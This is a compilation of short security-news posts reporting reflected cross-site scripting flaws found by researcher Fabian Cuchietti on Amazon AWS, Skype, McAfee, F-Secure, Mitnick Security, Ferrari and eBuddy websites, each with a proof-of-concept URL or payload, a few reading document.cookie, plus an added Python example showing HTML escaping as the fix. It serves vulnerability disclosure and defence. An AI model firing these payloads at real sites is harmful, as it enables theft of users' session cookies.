XSS vulnerability in Amazon website, found by Fabian Cuchietti

Security researcher Fabian Cuchietti discovered an XSS vulnerability in the Amazon Web Services website (aws.amazon.com).

POC:
https://aws.amazon.com/amis?ami_provider_id=4&architecture='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x015E00)%3C/script%3E&selection=ami_provider_id%2Barchitecture

It seems that the vulnerability has been fixed by the vendor: the admin now filters HTML code by converting it to HTML special characters. However, a mirror of the vulnerability can still be retrieved from XSSed.com.

Mirror is available here:
http://www.xssed.com/mirror/77551/
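
The fix described above (converting HTML special characters) can be checked by parsing the rendered output and looking for markup the template never contained. This is an added example, not code from the original post or from any of the sites mentioned; the template, function names and attribute context are assumptions, and the two parameter values are the ones quoted in PoC URLs on this page.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed template: reflects one parameter into a quoted attribute.
TEMPLATE = '<input type="text" name="q" value="{}">'
EXPECTED_ATTRS = {"type", "name", "value"}

# Parameter values copied from the PoC URLs quoted on this page, URL-decoded.
AWS_VALUE = unquote("'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x015E00)%3C/script%3E")
EBUDDY_VALUE = unquote("%22%20onmouseover%3Dprompt%28961107%29%20bad%3D%22")

def render_raw(value):
    """'Before' behaviour: the value is reflected without encoding."""
    return TEMPLATE.format(value)

def render_encoded(value):
    """The fix: convert HTML special characters (quote=True covers " and ')."""
    return TEMPLATE.format(html.escape(value, quote=True))

class _Collector(HTMLParser):
    """Records every start tag and the attributes of the first <input>."""
    def __init__(self):
        super().__init__()
        self.tags, self.input_attrs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input" and not self.input_attrs:
            self.input_attrs = dict(attrs)

def injected_markup(rendered):
    """Return (extra elements, extra <input> attributes, parsed value)."""
    parser = _Collector()
    parser.feed(rendered)
    parser.close()
    extra_tags = [t for t in parser.tags if t != "input"]
    extra_attrs = sorted(set(parser.input_attrs) - EXPECTED_ATTRS)
    return extra_tags, extra_attrs, parser.input_attrs.get("value")

if __name__ == "__main__":
    for value in (AWS_VALUE, EBUDDY_VALUE):
        print("raw    :", injected_markup(render_raw(value))[:2])
        print("encoded:", injected_markup(render_encoded(value))[:2])
```

HTML entity encoding is the right output encoding for HTML text and quoted attribute values; values reflected into script blocks, URLs or unquoted attributes need encoding for that context instead.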

Screenshot of the vulnerability

XSS vulnerability found in Skype, F-Secure and McAfee websites

After an interesting XSS find in Kevin Mitnick's site, security researcher Fabián Cuchietti has come up with more interesting finds. This time he discovered XSS vulnerabilities in the Skype, McAfee and F-Secure websites.





The Phorm page of Skype is vulnerable to cross-site scripting.
POC:
http://about.skype.com/press/enquiry/phorm/phorm.php?PHORM_CONFIG=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E

McAfee:



https://kc.mcafee.com/corporate/index?page=content&channel=%27%22%20onmouseover=prompt%28090943%29%20bad=%22%20//

F-Secure: 


https://kb.f-secure.com/display/2/loginSecureFrame.aspx?cpid=%22%20onmouseover=prompt%2883893%29%20bad=%22%20//&c=3&cpc=3&cid=3&t=3&aid=3&cat=3&catURL=3&r=0.490020453929901

The XSS vulnerabilities discovered on these sites could allow an attacker to steal cookies if he manages to convince users to click on a specially crafted link.

XSS vulnerability found in Kevin Mitnick's website by Fabián Cuchietti


Kevin Mitnick, the legend of social engineering, was once the most-wanted computer criminal in the United States and now works as a security consultant. The website belonging to Mitnick has been found to be vulnerable to cross-site scripting (XSS).

Vulnerability details:
  • Target: MitnickSecurity
  • Vulnerable link: http://mitnicksecurity.com/workshop_signup.php
  • Vulnerable field: strEmail
  • POC: /"><iframe onload=alert(document.cookie)>

The above-mentioned vulnerability was found by security researcher Fabián Cuchietti. Cuchietti also recently discovered an XSS vulnerability in the Ferrari website.

XSS vulnerability in Ferrari Website, found by @FabianCuchietti


Security researcher Fabian Cuchietti has discovered a cross-site scripting vulnerability in the Ferrari website. Ferrari S.p.A. is an Italian sports car manufacturer based in Maranello, Italy, founded by Enzo Ferrari in 1929 as Scuderia Ferrari.


POC:
http://www.ferrari.com/English/Formula1/Search/Pages/AllCategories.aspx?k="><script>alert('Ferrari XSS - @FabianCuchietti')</script>

eBuddy official website vulnerable to cross-site scripting

A security analyst known as Fabián Cuchietti discovered a cross-site scripting (XSS) vulnerability in the official website of eBuddy.

eBuddy Web Messenger is a web-based instant messaging service that allows users to chat online with friends on MSN, Yahoo, AIM, ICQ, GTalk, Facebook and MySpace IM.

The email unsubscribe page of the eBuddy website was found to be vulnerable to XSS: the mail address field is reflected without filtering.


POC:
http://www.ebuddy.com/unsubscribe.php?email=%22%20onmouseover%3Dprompt%28961107%29%20bad%3D%22&submit=Unsubscribe